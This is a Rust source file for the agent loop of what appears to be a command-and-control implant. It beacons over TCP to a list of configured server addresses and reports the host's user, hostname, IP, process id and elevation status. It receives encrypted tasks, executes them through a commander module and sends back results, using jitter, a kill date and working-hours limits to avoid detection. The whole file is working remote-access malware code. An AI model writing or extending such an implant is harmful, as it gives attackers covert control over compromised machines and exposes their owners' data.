use crate::commander;
use crate::connector_tcp::ConnectorTCP;
use crate::crypto;
use crate::protocol;
use crate::runtime_common;
use rand::rngs::OsRng;
use rand::RngCore;
use std::net::TcpStream;

pub struct Agent {
    pub active: bool,
    pub profile: protocol::Profile,
    pub session_key: Vec<u8>,
    pub sleep_secs: i32,
    pub jitter: i32,
    pub kill_date: i64,
    pub work_start: i32,
    pub work_end: i32,
    pub burst_enabled: i32,
    pub burst_sleep: i32,
    pub burst_jitter: i32,
    pub chunk_size: i32,
    pub connector: ConnectorTCP,
}

impl Agent {
    pub fn new(profile: protocol::Profile) -> Self {
        let mut session_key = vec![0u8; crypto::KEY_SIZE];
        OsRng.fill_bytes(&mut session_key);

        Self {
            active: true,
            sleep_secs: if profile.sleep > 0 { profile.sleep } else { 5 },
            jitter: profile.jitter,
            kill_date: profile.kill_date,
            work_start: profile.work_start,
            work_end: profile.work_end,
            burst_enabled: 0,
            burst_sleep: 0,
            burst_jitter: 0,
            chunk_size: 0,
            connector: ConnectorTCP::new(profile.clone()),
            profile,
            session_key,
        }
    }

    pub fn run(&mut self) {
        if self.profile.addresses.is_empty() {
            return;
        }

        let mut index = 0usize;
        while self.active {
            if self.should_exit() {
                break;
            }
            self.wait_for_working_hours();

            let addr = self.profile.addresses[index % self.profile.addresses.len()].clone();
            index += 1;

            match self.connector.connect_to(&addr) {
                Ok(mut stream) => {
                    if self.send_init(&mut stream).is_ok() {
                        self.task_loop(&mut stream);
                    }
                }
                Err(_) => {}
            }

            self.sleep_with_jitter();
        }
    }

    fn send_init(&self, stream: &mut TcpStream) -> Result<(), String> {
        let beat = protocol::marshal(&self.create_info())?;
        let init = protocol::marshal(&protocol::InitPack {
            id: self.random_u32(),
            r#type: self.profile.r#type,
            data: beat,
        })?;
        let start = protocol::marshal(&protocol::StartMsg {
            id: protocol::INIT_PACK,
            data: init,
        })?;
        let enc = crypto::encrypt(&start, &self.session_key).map_err(|e| e.to_string())?;
        protocol::tcp_send_msg(stream, &enc).map_err(|e| e.to_string())
    }

    fn task_loop(&mut self, stream: &mut TcpStream) {
        while self.active {
            if self.should_exit() {
                break;
            }
            self.wait_for_working_hours();

            let data = match protocol::tcp_recv_msg(stream) {
                Ok(data) if !data.is_empty() => data,
                _ => break,
            };

            let plain = match crypto::decrypt(&data, &self.session_key) {
                Ok(plain) => plain,
                Err(_) => break,
            };

            let message: protocol::Message = match protocol::unmarshal(&plain) {
                Ok(msg) => msg,
                Err(_) => break,
            };

            if message.r#type != 1 {
                self.sleep_with_jitter();
                continue;
            }

            let responses = commander::process_tasks(self, &message.object);
            if responses.is_empty() {
                self.sleep_with_jitter();
                continue;
            }

            let out = match protocol::marshal(&protocol::Message {
                r#type: 1,
                object: responses,
            }) {
                Ok(out) => out,
                Err(_) => break,
            };

            let enc = match crypto::encrypt(&out, &self.session_key) {
                Ok(enc) => enc,
                Err(_) => break,
            };

            if protocol::tcp_send_msg(stream, &enc).is_err() {
                break;
            }

            self.sleep_with_jitter();
        }
    }

    pub fn sleep_with_jitter(&self) {
        runtime_common::sleep_with_jitter(self.sleep_secs.max(0) as u64 * 1000, self.jitter.max(0) as u32, 100);
    }

    pub fn should_exit(&self) -> bool {
        runtime_common::should_exit(self.kill_date)
    }

    pub fn wait_for_working_hours(&self) {
        runtime_common::wait_for_working_hours(self.work_start, self.work_end)
    }

    fn create_info(&self) -> protocol::SessionInfo {
        protocol::SessionInfo {
            process: self.process_name(),
            pid: std::process::id() as i32,
            user: std::env::var("USER").or_else(|_| std::env::var("USERNAME")).unwrap_or_default(),
            host: runtime_common::hostname(),
            ipaddr: runtime_common::local_ipv4(),
            elevated: runtime_common::is_elevated(),
            acp: 65001,
            oem: 65001,
            os: std::env::consts::OS.to_string(),
            os_version: std::env::consts::OS.to_string(),
            encrypt_key: self.session_key.clone(),
        }
    }

    fn process_name(&self) -> String {
        runtime_common::process_name("__NAME__")
    }

    fn random_u32(&self) -> u32 {
        let mut buf = [0u8; 4];
        OsRng.fill_bytes(&mut buf);
        u32::from_be_bytes(buf)
    }

    #[allow(dead_code)]
    fn now_unix(&self) -> i64 {
        runtime_common::now_unix()
    }
}